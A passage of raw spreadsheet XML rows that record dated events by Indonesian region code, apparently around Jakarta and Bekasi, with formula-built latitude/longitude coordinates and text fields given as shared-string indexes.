      <c r="Y3113" t="str">
        <f t="shared" si="48"/>
        <v>-6.26580,106.94824</v>
      </c>
    </row>
    <row r="3114" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3114">
        <v>255575</v>
      </c>
      <c r="B3114" s="1">
        <v>44246</v>
      </c>
      <c r="C3114" s="2">
        <v>2.3831018518518519E-2</v>
      </c>
      <c r="D3114" t="s">
        <v>22</v>
      </c>
      <c r="E3114" t="s">
        <v>23</v>
      </c>
      <c r="F3114" t="s">
        <v>10481</v>
      </c>
      <c r="H3114" t="s">
        <v>26</v>
      </c>
      <c r="I3114" t="s">
        <v>1099</v>
      </c>
      <c r="J3114" t="s">
        <v>1656</v>
      </c>
      <c r="L3114" t="s">
        <v>10482</v>
      </c>
      <c r="M3114">
        <v>3173080003</v>
      </c>
      <c r="N3114">
        <v>3173080</v>
      </c>
      <c r="O3114">
        <v>3173</v>
      </c>
      <c r="P3114">
        <v>31</v>
      </c>
      <c r="Q3114" t="s">
        <v>157</v>
      </c>
      <c r="R3114" t="s">
        <v>157</v>
      </c>
      <c r="S3114" t="s">
        <v>62</v>
      </c>
      <c r="T3114" t="s">
        <v>33</v>
      </c>
      <c r="U3114" s="5">
        <v>10682715</v>
      </c>
      <c r="V3114" s="5" t="s">
        <v>16381</v>
      </c>
      <c r="W3114" s="5">
        <v>-617539</v>
      </c>
      <c r="X3114" t="s">
        <v>19329</v>
      </c>
      <c r="Y3114" t="str">
        <f t="shared" si="48"/>
        <v>-6.17539,106.82715</v>
      </c>
    </row>
    <row r="3115" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3115">
        <v>255585</v>
      </c>
      <c r="B3115" s="1">
        <v>44246</v>
      </c>
      <c r="C3115" s="2">
        <v>2.6990740740740742E-2</v>
      </c>
      <c r="D3115" t="s">
        <v>22</v>
      </c>
      <c r="E3115" t="s">
        <v>23</v>
      </c>
      <c r="F3115" t="s">
        <v>10483</v>
      </c>
      <c r="G3115" t="s">
        <v>10484</v>
      </c>
      <c r="H3115" t="s">
        <v>26</v>
      </c>
      <c r="I3115" t="s">
        <v>166</v>
      </c>
      <c r="J3115" t="s">
        <v>125</v>
      </c>
      <c r="M3115">
        <v>3172070001</v>
      </c>
      <c r="N3115">
        <v>3172070</v>
      </c>
      <c r="O3115">
        <v>3172</v>
      </c>
      <c r="P3115">
        <v>31</v>
      </c>
      <c r="Q3115" t="s">
        <v>127</v>
      </c>
      <c r="R3115" t="s">
        <v>128</v>
      </c>
      <c r="S3115" t="s">
        <v>49</v>
      </c>
      <c r="T3115" t="s">
        <v>33</v>
      </c>
      <c r="U3115" s="5">
        <v>10689615</v>
      </c>
      <c r="V3115" s="5" t="s">
        <v>17251</v>
      </c>
      <c r="W3115" s="5">
        <v>-623927</v>
      </c>
      <c r="X3115" t="s">
        <v>20992</v>
      </c>
      <c r="Y3115" t="str">
        <f t="shared" si="48"/>
        <v>-6.23927,106.89615</v>
      </c>
    </row>
    <row r="3116" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3116">
        <v>255604</v>
      </c>
      <c r="B3116" s="1">
        <v>44246</v>
      </c>
      <c r="C3116" s="2">
        <v>3.5439814814814813E-2</v>
      </c>
      <c r="D3116" t="s">
        <v>22</v>
      </c>
      <c r="E3116" t="s">
        <v>23</v>
      </c>
      <c r="F3116" t="s">
        <v>10485</v>
      </c>
      <c r="G3116" t="s">
        <v>10486</v>
      </c>
      <c r="H3116" t="s">
        <v>26</v>
      </c>
      <c r="I3116" t="s">
        <v>271</v>
      </c>
      <c r="J3116" t="s">
        <v>2627</v>
      </c>
      <c r="L3116" t="s">
        <v>10487</v>
      </c>
      <c r="M3116">
        <v>3275060002</v>
      </c>
      <c r="N3116">
        <v>3275060</v>
      </c>
      <c r="O3116">
        <v>3275</v>
      </c>
      <c r="P3116">
        <v>32</v>
      </c>
      <c r="Q3116" t="s">
        <v>113</v>
      </c>
      <c r="R3116" t="s">
        <v>114</v>
      </c>
      <c r="S3116" t="s">
        <v>41</v>
      </c>
      <c r="T3116" t="s">
        <v>42</v>
      </c>
      <c r="U3116" s="5">
        <v>10696579</v>
      </c>
      <c r="V3116" s="5" t="s">
        <v>17252</v>
      </c>
      <c r="W3116" s="5">
        <v>-623318</v>
      </c>
      <c r="X3116" t="s">
        <v>20993</v>
      </c>
      <c r="Y3116" t="str">
        <f t="shared" si="48"/>
        <v>-6.23318,106.96579</v>
      </c>
    </row>
    <row r="3117" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3117">
        <v>255614</v>
      </c>
      <c r="B3117" s="1">
        <v>44246</v>
      </c>
      <c r="C3117" s="2">
        <v>3.5891203703703703E-2</v>
      </c>
      <c r="D3117" t="s">
        <v>22</v>
      </c>
      <c r="E3117" t="s">
        <v>23</v>
      </c>
      <c r="F3117" t="s">
        <v>10488</v>
      </c>
      <c r="G3117" t="s">
        <v>10489</v>
      </c>
      <c r="H3117" t="s">
        <v>26</v>
      </c>
      <c r="I3117" t="s">
        <v>2395</v>
      </c>
      <c r="J3117" t="s">
        <v>2627</v>
      </c>
      <c r="L3117" t="s">
        <v>10490</v>
      </c>
      <c r="M3117">
        <v>3275020006</v>
      </c>
      <c r="N3117">
        <v>3275020</v>
      </c>
      <c r="O3117">
        <v>3275</v>
      </c>
      <c r="P3117">
        <v>32</v>
      </c>
      <c r="Q3117" t="s">
        <v>4024</v>
      </c>
      <c r="R3117" t="s">
        <v>828</v>
      </c>
      <c r="S3117" t="s">
        <v>41</v>
      </c>
      <c r="T3117" t="s">
        <v>42</v>
      </c>
      <c r="U3117" s="5">
        <v>10694046</v>
      </c>
      <c r="V3117" s="5" t="s">
        <v>17253</v>
      </c>
      <c r="W3117" s="5">
        <v>-627024</v>
      </c>
      <c r="X3117" t="s">
        <v>19912</v>
      </c>
      <c r="Y3117" t="str">
        <f t="shared" si="48"/>
        <v>-6.27024,106.94046</v>
      </c>
    </row>
    <row r="3118" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3118">
        <v>255633</v>
      </c>
      <c r="B3118" s="1">
        <v>44246</v>
      </c>
      <c r="C3118" s="2">
        <v>4.5555555555555551E-2</v>
      </c>
      <c r="D3118" t="s">
        <v>22</v>
      </c>
      <c r="E3118" t="s">
        <v>23</v>
      </c>
      <c r="F3118" t="s">
        <v>10491</v>
      </c>
      <c r="G3118" t="s">
        <v>10492</v>
      </c>
      <c r="H3118" t="s">
        <v>26</v>
      </c>
      <c r="I3118" t="s">
        <v>197</v>
      </c>
      <c r="J3118" t="s">
        <v>2627</v>
      </c>
      <c r="L3118" t="s">
        <v>10493</v>
      </c>
      <c r="M3118">
        <v>3275010012</v>
      </c>
      <c r="N3118">
        <v>3275010</v>
      </c>
      <c r="O3118">
        <v>3275</v>
      </c>
      <c r="P3118">
        <v>32</v>
      </c>
      <c r="Q3118" t="s">
        <v>2322</v>
      </c>
      <c r="R3118" t="s">
        <v>287</v>
      </c>
      <c r="S3118" t="s">
        <v>41</v>
      </c>
      <c r="T3118" t="s">
        <v>42</v>
      </c>
      <c r="U3118" s="5">
        <v>10692787</v>
      </c>
      <c r="V3118" s="5" t="s">
        <v>17254</v>
      </c>
      <c r="W3118" s="5">
        <v>-626632</v>
      </c>
      <c r="X3118" t="s">
        <v>20994</v>
      </c>
      <c r="Y3118" t="str">
        <f t="shared" si="48"/>
        <v>-6.26632,106.92787</v>
      </c>
    </row>
    <row r="3119" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3119">
        <v>255634</v>
      </c>
      <c r="B3119" s="1">
        <v>44246</v>
      </c>
      <c r="C3119" s="2">
        <v>4.6273148148148147E-2</v>
      </c>
      <c r="D3119" t="s">
        <v>22</v>
      </c>
      <c r="E3119" t="s">
        <v>23</v>
      </c>
      <c r="F3119" t="s">
        <v>10494</v>
      </c>
      <c r="H3119" t="s">
        <v>26</v>
      </c>
      <c r="I3119" t="s">
        <v>862</v>
      </c>
      <c r="J3119" t="s">
        <v>2536</v>
      </c>
      <c r="L3119" t="s">
        <v>10495</v>
      </c>
      <c r="M3119">
        <v>3172040005</v>
      </c>
      <c r="N3119">
        <v>3172040</v>
      </c>
      <c r="O3119">
        <v>3172</v>
      </c>
      <c r="P3119">
        <v>31</v>
      </c>
      <c r="Q3119" t="s">
        <v>1351</v>
      </c>
      <c r="R3119" t="s">
        <v>281</v>
      </c>
      <c r="S3119" t="s">
        <v>49</v>
      </c>
      <c r="T3119" t="s">
        <v>33</v>
      </c>
      <c r="U3119" s="5">
        <v>10690213</v>
      </c>
      <c r="V3119" s="5" t="s">
        <v>17255</v>
      </c>
      <c r="W3119" s="5">
        <v>-624760</v>
      </c>
      <c r="X3119" t="s">
        <v>20995</v>
      </c>
      <c r="Y3119" t="str">
        <f t="shared" si="48"/>
        <v>-6.24760,106.90213</v>
      </c>
    </row>
    <row r="3120" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3120">
        <v>255698</v>
      </c>
      <c r="B3120" s="1">
        <v>44246</v>
      </c>
      <c r="C3120" s="2">
        <v>6.9467592592592595E-2</v>
      </c>
      <c r="D3120" t="s">
        <v>22</v>
      </c>
      <c r="E3120" t="s">
        <v>23</v>
      </c>
      <c r="F3120" t="s">
        <v>10496</v>
      </c>
      <c r="G3120" t="s">
        <v>10497</v>
      </c>
      <c r="H3120" t="s">
        <v>26</v>
      </c>
      <c r="I3120" t="s">
        <v>4381</v>
      </c>
      <c r="J3120" t="s">
        <v>6354</v>
      </c>
      <c r="M3120">
        <v>3172040002</v>
      </c>
      <c r="N3120">
        <v>3172040</v>
      </c>
      <c r="O3120">
        <v>3172</v>
      </c>
      <c r="P3120">
        <v>31</v>
      </c>
      <c r="Q3120" t="s">
        <v>281</v>
      </c>
      <c r="R3120" t="s">
        <v>281</v>
      </c>
      <c r="S3120" t="s">
        <v>49</v>
      </c>
      <c r="T3120" t="s">
        <v>33</v>
      </c>
      <c r="U3120" s="5">
        <v>10688123</v>
      </c>
      <c r="V3120" s="5" t="s">
        <v>17256</v>
      </c>
      <c r="W3120" s="5">
        <v>-627550</v>
      </c>
      <c r="X3120" t="s">
        <v>19907</v>
      </c>
      <c r="Y3120" t="str">
        <f t="shared" si="48"/>
        <v>-6.27550,106.88123</v>
      </c>
    </row>
    <row r="3121" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3121">
        <v>255744</v>
      </c>
      <c r="B3121" s="1">
        <v>44246</v>
      </c>
      <c r="C3121" s="2">
        <v>8.2372685185185188E-2</v>
      </c>
      <c r="D3121" t="s">
        <v>22</v>
      </c>
      <c r="E3121" t="s">
        <v>23</v>
      </c>
      <c r="F3121" t="s">
        <v>10498</v>
      </c>
      <c r="G3121" t="s">
        <v>10499</v>
      </c>
      <c r="H3121" t="s">
        <v>26</v>
      </c>
      <c r="I3121" t="s">
        <v>974</v>
      </c>
      <c r="J3121" t="s">
        <v>5573</v>
      </c>
      <c r="L3121" t="s">
        <v>10500</v>
      </c>
      <c r="M3121">
        <v>3171070005</v>
      </c>
      <c r="N3121">
        <v>3171070</v>
      </c>
      <c r="O3121">
        <v>3171</v>
      </c>
      <c r="P3121">
        <v>31</v>
      </c>
      <c r="Q3121" t="s">
        <v>218</v>
      </c>
      <c r="R3121" t="s">
        <v>121</v>
      </c>
      <c r="S3121" t="s">
        <v>108</v>
      </c>
      <c r="T3121" t="s">
        <v>33</v>
      </c>
      <c r="U3121" s="5">
        <v>10682066</v>
      </c>
      <c r="V3121" s="5" t="s">
        <v>17257</v>
      </c>
      <c r="W3121" s="5">
        <v>-623640</v>
      </c>
      <c r="X3121" t="s">
        <v>20996</v>
      </c>
      <c r="Y3121" t="str">
        <f t="shared" si="48"/>
        <v>-6.23640,106.82066</v>
      </c>
    </row>
    <row r="3122" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3122">
        <v>255772</v>
      </c>
      <c r="B3122" s="1">
        <v>44246</v>
      </c>
      <c r="C3122" s="2">
        <v>9.1597222222222219E-2</v>
      </c>
      <c r="D3122" t="s">
        <v>22</v>
      </c>
      <c r="E3122" t="s">
        <v>23</v>
      </c>
      <c r="F3122" t="s">
        <v>10501</v>
      </c>
      <c r="G3122" t="s">
        <v>10502</v>
      </c>
      <c r="H3122" t="s">
        <v>26</v>
      </c>
      <c r="I3122" t="s">
        <v>4381</v>
      </c>
      <c r="J3122" t="s">
        <v>10503</v>
      </c>
      <c r="M3122">
        <v>3172040004</v>
      </c>
      <c r="N3122">
        <v>3172040</v>
      </c>
      <c r="O3122">
        <v>3172</v>
      </c>
      <c r="P3122">
        <v>31</v>
      </c>
      <c r="Q3122" t="s">
        <v>280</v>
      </c>
      <c r="R3122" t="s">
        <v>281</v>
      </c>
      <c r="S3122" t="s">
        <v>49</v>
      </c>
      <c r="T3122" t="s">
        <v>33</v>
      </c>
      <c r="U3122" s="5">
        <v>10689217</v>
      </c>
      <c r="V3122" s="5" t="s">
        <v>17258</v>
      </c>
      <c r="W3122" s="5">
        <v>-624229</v>
      </c>
      <c r="X3122" t="s">
        <v>20997</v>
      </c>
      <c r="Y3122" t="str">
        <f t="shared" si="48"/>
        <v>-6.24229,106.89217</v>
      </c>
    </row>
    <row r="3123" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3123">
        <v>255818</v>
      </c>
      <c r="B3123" s="1">
        <v>44246</v>
      </c>
      <c r="C3123" s="2">
        <v>0.11214120370370372</v>
      </c>
      <c r="D3123" t="s">
        <v>22</v>
      </c>
      <c r="E3123" t="s">
        <v>23</v>
      </c>
      <c r="F3123" t="s">
        <v>10504</v>
      </c>
      <c r="H3123" t="s">
        <v>26</v>
      </c>
      <c r="I3123" t="s">
        <v>834</v>
      </c>
      <c r="J3123" t="s">
        <v>2627</v>
      </c>
      <c r="L3123" t="s">
        <v>10505</v>
      </c>
      <c r="M3123">
        <v>3275010011</v>
      </c>
      <c r="N3123">
        <v>3275010</v>
      </c>
      <c r="O3123">
        <v>3275</v>
      </c>
      <c r="P3123">
        <v>32</v>
      </c>
      <c r="Q3123" t="s">
        <v>2389</v>
      </c>
      <c r="R3123" t="s">
        <v>287</v>
      </c>
      <c r="S3123" t="s">
        <v>41</v>
      </c>
      <c r="T3123" t="s">
        <v>42</v>
      </c>
      <c r="U3123" s="5">
        <v>10691148</v>
      </c>
      <c r="V3123" s="5" t="s">
        <v>17259</v>
      </c>
      <c r="W3123" s="5">
        <v>-625807</v>
      </c>
      <c r="X3123" t="s">
        <v>20998</v>
      </c>
      <c r="Y3123" t="str">
        <f t="shared" si="48"/>
        <v>-6.25807,106.91148</v>
      </c>
    </row>
    <row r="3124" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3124">
        <v>255873</v>
      </c>
      <c r="B3124" s="1">
        <v>44246</v>
      </c>
      <c r="C3124" s="2">
        <v>0.13076388888888887</v>
      </c>
      <c r="D3124" t="s">
        <v>22</v>
      </c>
      <c r="E3124" t="s">
        <v>23</v>
      </c>
      <c r="F3124" t="s">
        <v>10506</v>
      </c>
      <c r="G3124" t="s">
        <v>10507</v>
      </c>
      <c r="H3124" t="s">
        <v>26</v>
      </c>
      <c r="I3124" t="s">
        <v>80</v>
      </c>
      <c r="J3124" t="s">
        <v>2627</v>
      </c>
      <c r="L3124" t="s">
        <v>10508</v>
      </c>
      <c r="M3124">
        <v>3275041003</v>
      </c>
      <c r="N3124">
        <v>3275041</v>
      </c>
      <c r="O3124">
        <v>3275</v>
      </c>
      <c r="P3124">
        <v>32</v>
      </c>
      <c r="Q3124" t="s">
        <v>432</v>
      </c>
      <c r="R3124" t="s">
        <v>134</v>
      </c>
      <c r="S3124" t="s">
        <v>41</v>
      </c>
      <c r="T3124" t="s">
        <v>42</v>
      </c>
      <c r="U3124" s="5">
        <v>10700181</v>
      </c>
      <c r="V3124" s="5" t="s">
        <v>17260</v>
      </c>
      <c r="W3124" s="5">
        <v>-626430</v>
      </c>
      <c r="X3124" t="s">
        <v>20999</v>
      </c>
      <c r="Y3124" t="str">
        <f t="shared" si="48"/>
        <v>-6.26430,107.00181</v>
      </c>
    </row>
    <row r="3125" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3125">
        <v>255937</v>
      </c>
      <c r="B3125" s="1">
        <v>44246</v>
      </c>
      <c r="C3125" s="2">
        <v>0.15570601851851854</v>
      </c>
      <c r="D3125" t="s">
        <v>22</v>
      </c>
      <c r="E3125" t="s">
        <v>23</v>
      </c>
      <c r="F3125" t="s">
        <v>10509</v>
      </c>
      <c r="G3125" t="s">
        <v>10510</v>
      </c>
      <c r="H3125" t="s">
        <v>26</v>
      </c>
      <c r="I3125" t="s">
        <v>1046</v>
      </c>
      <c r="J3125" t="s">
        <v>2627</v>
      </c>
      <c r="L3125" t="s">
        <v>10511</v>
      </c>
      <c r="M3125">
        <v>3216081001</v>
      </c>
      <c r="N3125">
        <v>3216081</v>
      </c>
      <c r="O3125">
        <v>3216</v>
      </c>
      <c r="P3125">
        <v>32</v>
      </c>
      <c r="Q3125" t="s">
        <v>1726</v>
      </c>
      <c r="R3125" t="s">
        <v>2512</v>
      </c>
      <c r="S3125" t="s">
        <v>41</v>
      </c>
      <c r="T3125" t="s">
        <v>42</v>
      </c>
      <c r="U3125" s="5">
        <v>10702212</v>
      </c>
      <c r="V3125" s="5" t="s">
        <v>17261</v>
      </c>
      <c r="W3125" s="5">
        <v>-626876</v>
      </c>
      <c r="X3125" t="s">
        <v>21000</v>
      </c>
      <c r="Y3125" t="str">
        <f t="shared" si="48"/>
        <v>-6.26876,107.02212</v>
      </c>
    </row>
    <row r="3126" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3126">
        <v>255974</v>
      </c>
      <c r="B3126" s="1">
        <v>44246</v>
      </c>
      <c r="C3126" s="2">
        <v>0.16828703703703704</v>
      </c>
      <c r="D3126" t="s">
        <v>22</v>
      </c>
      <c r="E3126" t="s">
        <v>23</v>
      </c>
      <c r="F3126" t="s">
        <v>10512</v>
      </c>
      <c r="H3126" t="s">
        <v>26</v>
      </c>
      <c r="I3126" t="s">
        <v>1633</v>
      </c>
      <c r="J3126" t="s">
        <v>2627</v>
      </c>
      <c r="L3126" t="s">
        <v>10513</v>
      </c>
      <c r="M3126">
        <v>3216082001</v>
      </c>
      <c r="N3126">
        <v>3216082</v>
      </c>
      <c r="O3126">
        <v>3216</v>
      </c>
      <c r="P3126">
        <v>32</v>
      </c>
      <c r="Q3126" t="s">
        <v>600</v>
      </c>
      <c r="R3126" t="s">
        <v>601</v>
      </c>
      <c r="S3126" t="s">
        <v>41</v>
      </c>
      <c r="T3126" t="s">
        <v>42</v>
      </c>
      <c r="U3126" s="5">
        <v>10705233</v>
      </c>
      <c r="V3126" s="5" t="s">
        <v>17262</v>
      </c>
      <c r="W3126" s="5">
        <v>-622241</v>
      </c>
      <c r="X3126" t="s">
        <v>21001</v>
      </c>
      <c r="Y3126" t="str">
        <f t="shared" si="48"/>
        <v>-6.22241,107.05233</v>
      </c>
    </row>
    <row r="3127" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3127">
        <v>256047</v>
      </c>
      <c r="B3127" s="1">
        <v>44246</v>
      </c>
      <c r="C3127" s="2">
        <v>0.18935185185185185</v>
      </c>
      <c r="D3127" t="s">
        <v>85</v>
      </c>
      <c r="E3127" t="s">
        <v>23</v>
      </c>
      <c r="F3127" t="s">
        <v>10514</v>
      </c>
      <c r="G3127" t="s">
        <v>10515</v>
      </c>
      <c r="H3127" t="s">
        <v>26</v>
      </c>
      <c r="I3127" t="s">
        <v>1059</v>
      </c>
      <c r="J3127" t="s">
        <v>778</v>
      </c>
      <c r="K3127" t="s">
        <v>10516</v>
      </c>
      <c r="L3127" t="s">
        <v>10517</v>
      </c>
      <c r="M3127">
        <v>3171070004</v>
      </c>
      <c r="N3127">
        <v>3171070</v>
      </c>
      <c r="O3127">
        <v>3171</v>
      </c>
      <c r="P3127">
        <v>31</v>
      </c>
      <c r="Q3127" t="s">
        <v>121</v>
      </c>
      <c r="R3127" t="s">
        <v>121</v>
      </c>
      <c r="S3127" t="s">
        <v>108</v>
      </c>
      <c r="T3127" t="s">
        <v>33</v>
      </c>
      <c r="U3127" s="5">
        <v>10682979</v>
      </c>
      <c r="V3127" s="5" t="s">
        <v>17263</v>
      </c>
      <c r="W3127" s="5">
        <v>-624113</v>
      </c>
      <c r="X3127" t="s">
        <v>21002</v>
      </c>
      <c r="Y3127" t="str">
        <f t="shared" si="48"/>
        <v>-6.24113,106.82979</v>
      </c>
    </row>
    <row r="3128" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3128">
        <v>256193</v>
      </c>
      <c r="B3128" s="1">
        <v>44246</v>
      </c>
      <c r="C3128" s="2">
        <v>0.25017361111111108</v>
      </c>
      <c r="D3128" t="s">
        <v>22</v>
      </c>
      <c r="E3128" t="s">
        <v>23</v>
      </c>
      <c r="F3128" t="s">
        <v>10518</v>
      </c>
      <c r="G3128" t="s">
        <v>10519</v>
      </c>
      <c r="H3128" t="s">
        <v>26</v>
      </c>
      <c r="I3128" t="s">
        <v>1046</v>
      </c>
      <c r="J3128" t="s">
        <v>10520</v>
      </c>
      <c r="L3128" t="s">
        <v>10521</v>
      </c>
      <c r="M3128">
        <v>7401140012</v>
      </c>
      <c r="N3128">
        <v>7401140</v>
      </c>
      <c r="O3128">
        <v>7401</v>
      </c>
      <c r="P3128">
        <v>74</v>
      </c>
      <c r="Q3128" t="s">
        <v>10522</v>
      </c>
      <c r="R3128" t="s">
        <v>10522</v>
      </c>
      <c r="S3128" t="s">
        <v>10523</v>
      </c>
      <c r="T3128" t="s">
        <v>10524</v>
      </c>
      <c r="U3128" s="5">
        <v>12229004</v>
      </c>
      <c r="V3128" s="5" t="s">
        <v>17264</v>
      </c>
      <c r="W3128" s="5">
        <v>-528289</v>
      </c>
      <c r="X3128" t="s">
        <v>21003</v>
      </c>
      <c r="Y3128" t="str">
        <f t="shared" si="48"/>
        <v>-5.28289,122.29004</v>
      </c>
    </row>
    <row r="3129" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3129">
        <v>256356</v>
      </c>
      <c r="B3129" s="1">
        <v>44246</v>
      </c>
      <c r="C3129" s="2">
        <v>0.3109837962962963</v>
      </c>
      <c r="D3129" t="s">
        <v>22</v>
      </c>
      <c r="E3129" t="s">
        <v>23</v>
      </c>
      <c r="F3129" t="s">
        <v>10525</v>
      </c>
      <c r="G3129" t="s">
        <v>10526</v>
      </c>
      <c r="H3129" t="s">
        <v>26</v>
      </c>
      <c r="I3129" t="s">
        <v>181</v>
      </c>
      <c r="J3129" t="s">
        <v>2627</v>
      </c>
      <c r="L3129" t="s">
        <v>10527</v>
      </c>
      <c r="M3129">
        <v>3216082002</v>
      </c>
      <c r="N3129">
        <v>3216082</v>
      </c>
      <c r="O3129">
        <v>3216</v>
      </c>
      <c r="P3129">
        <v>32</v>
      </c>
      <c r="Q3129" t="s">
        <v>1273</v>
      </c>
      <c r="R3129" t="s">
        <v>601</v>
      </c>
      <c r="S3129" t="s">
        <v>41</v>
      </c>
      <c r="T3129" t="s">
        <v>42</v>
      </c>
      <c r="U3129" s="5">
        <v>10706240</v>
      </c>
      <c r="V3129" s="5" t="s">
        <v>17265</v>
      </c>
      <c r="W3129" s="5">
        <v>-621136</v>
      </c>
      <c r="X3129" t="s">
        <v>21004</v>
      </c>
      <c r="Y3129" t="str">
        <f t="shared" si="48"/>
        <v>-6.21136,107.06240</v>
      </c>
    </row>
    <row r="3130" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3130">
        <v>256393</v>
      </c>
      <c r="B3130" s="1">
        <v>44246</v>
      </c>
      <c r="C3130" s="2">
        <v>0.32648148148148148</v>
      </c>
      <c r="D3130" t="s">
        <v>22</v>
      </c>
      <c r="E3130" t="s">
        <v>23</v>
      </c>
      <c r="F3130" t="s">
        <v>10528</v>
      </c>
      <c r="G3130" t="s">
        <v>10529</v>
      </c>
      <c r="H3130" t="s">
        <v>26</v>
      </c>
      <c r="I3130" t="s">
        <v>1201</v>
      </c>
      <c r="J3130" t="s">
        <v>2627</v>
      </c>
      <c r="L3130" t="s">
        <v>10530</v>
      </c>
      <c r="M3130">
        <v>3275050001</v>
      </c>
      <c r="N3130">
        <v>3275050</v>
      </c>
      <c r="O3130">
        <v>3275</v>
      </c>
      <c r="P3130">
        <v>32</v>
      </c>
      <c r="Q3130" t="s">
        <v>4376</v>
      </c>
      <c r="R3130" t="s">
        <v>955</v>
      </c>
      <c r="S3130" t="s">
        <v>41</v>
      </c>
      <c r="T3130" t="s">
        <v>42</v>
      </c>
      <c r="U3130" s="5">
        <v>10696386</v>
      </c>
      <c r="V3130" s="5" t="s">
        <v>17266</v>
      </c>
      <c r="W3130" s="5">
        <v>-626239</v>
      </c>
      <c r="X3130" t="s">
        <v>21005</v>
      </c>
      <c r="Y3130" t="str">
        <f t="shared" si="48"/>
        <v>-6.26239,106.96386</v>
      </c>
    </row>
    <row r="3131" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3131">
        <v>256558</v>
      </c>
      <c r="B3131" s="1">
        <v>44246</v>
      </c>
      <c r="C3131" s="2">
        <v>0.38935185185185189</v>
      </c>
      <c r="D3131" t="s">
        <v>22</v>
      </c>
      <c r="E3131" t="s">
        <v>23</v>
      </c>
      <c r="F3131" t="s">
        <v>10531</v>
      </c>
      <c r="H3131" t="s">
        <v>26</v>
      </c>
      <c r="I3131" t="s">
        <v>517</v>
      </c>
      <c r="J3131" t="s">
        <v>10532</v>
      </c>
      <c r="L3131" t="s">
        <v>10533</v>
      </c>
      <c r="M3131">
        <v>3172040004</v>
      </c>
      <c r="N3131">
        <v>3172040</v>
      </c>
      <c r="O3131">
        <v>3172</v>
      </c>
      <c r="P3131">
        <v>31</v>
      </c>
      <c r="Q3131" t="s">
        <v>280</v>
      </c>
      <c r="R3131" t="s">
        <v>281</v>
      </c>
      <c r="S3131" t="s">
        <v>49</v>
      </c>
      <c r="T3131" t="s">
        <v>33</v>
      </c>
      <c r="U3131" s="5">
        <v>10687912</v>
      </c>
      <c r="V3131" s="5" t="s">
        <v>17267</v>
      </c>
      <c r="W3131" s="5">
        <v>-626585</v>
      </c>
      <c r="X3131" t="s">
        <v>21006</v>
      </c>
      <c r="Y3131" t="str">
        <f t="shared" si="48"/>
        <v>-6.26585,106.87912</v>
      </c>
    </row>
    <row r="3132" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3132">
        <v>256820</v>
      </c>
      <c r="B3132" s="1">
        <v>44246</v>
      </c>
      <c r="C3132" s="2">
        <v>0.48773148148148149</v>
      </c>
      <c r="D3132" t="s">
        <v>22</v>
      </c>
      <c r="E3132" t="s">
        <v>23</v>
      </c>
      <c r="F3132" t="s">
        <v>10534</v>
      </c>
      <c r="G3132" t="s">
        <v>10535</v>
      </c>
      <c r="H3132" t="s">
        <v>26</v>
      </c>
      <c r="I3132" t="s">
        <v>2028</v>
      </c>
      <c r="J3132" t="s">
        <v>2627</v>
      </c>
      <c r="L3132" t="s">
        <v>10536</v>
      </c>
      <c r="M3132">
        <v>3275020003</v>
      </c>
      <c r="N3132">
        <v>3275020</v>
      </c>
      <c r="O3132">
        <v>3275</v>
      </c>
      <c r="P3132">
        <v>32</v>
      </c>
      <c r="Q3132" t="s">
        <v>4738</v>
      </c>
      <c r="R3132" t="s">
        <v>828</v>
      </c>
      <c r="S3132" t="s">
        <v>41</v>
      </c>
      <c r="T3132" t="s">
        <v>42</v>
      </c>
      <c r="U3132" s="5">
        <v>10697061</v>
      </c>
      <c r="V3132" s="5" t="s">
        <v>17268</v>
      </c>
      <c r="W3132" s="5">
        <v>-630041</v>
      </c>
      <c r="X3132" t="s">
        <v>18630</v>
      </c>
      <c r="Y3132" t="str">
        <f t="shared" si="48"/>
        <v>-6.30041,106.97061</v>
      </c>
    </row>
    <row r="3133" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3133">
        <v>257210</v>
      </c>
      <c r="B3133" s="1">
        <v>44246</v>
      </c>
      <c r="C3133" s="2">
        <v>0.36180555555555555</v>
      </c>
      <c r="D3133" t="s">
        <v>2648</v>
      </c>
      <c r="E3133" t="s">
        <v>23</v>
      </c>
      <c r="G3133" t="s">
        <v>10537</v>
      </c>
      <c r="H3133" t="s">
        <v>26</v>
      </c>
      <c r="J3133" t="s">
        <v>3498</v>
      </c>
      <c r="L3133" t="s">
        <v>10538</v>
      </c>
      <c r="M3133">
        <v>3175060006</v>
      </c>
      <c r="N3133">
        <v>3175060</v>
      </c>
      <c r="O3133">
        <v>3175</v>
      </c>
      <c r="P3133">
        <v>31</v>
      </c>
      <c r="Q3133" t="s">
        <v>2409</v>
      </c>
      <c r="R3133" t="s">
        <v>2279</v>
      </c>
      <c r="S3133" t="s">
        <v>547</v>
      </c>
      <c r="T3133" t="s">
        <v>33</v>
      </c>
      <c r="U3133" s="5">
        <v>10692860</v>
      </c>
      <c r="V3133" s="5" t="s">
        <v>17269</v>
      </c>
      <c r="W3133" s="5">
        <v>-613487</v>
      </c>
      <c r="X3133" t="s">
        <v>21007</v>
      </c>
      <c r="Y3133" t="str">
        <f t="shared" si="48"/>
        <v>-6.13487,106.92860</v>
      </c>
    </row>
    <row r="3134" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3134">
        <v>257506</v>
      </c>
      <c r="B3134" s="1">
        <v>44246</v>
      </c>
      <c r="C3134" s="2">
        <v>0.73055555555555562</v>
      </c>
      <c r="D3134" t="s">
        <v>2648</v>
      </c>
      <c r="E3134" t="s">
        <v>23</v>
      </c>
      <c r="G3134" t="s">
        <v>10539</v>
      </c>
      <c r="H3134" t="s">
        <v>26</v>
      </c>
      <c r="I3134" t="s">
        <v>103</v>
      </c>
      <c r="J3134" t="s">
        <v>10540</v>
      </c>
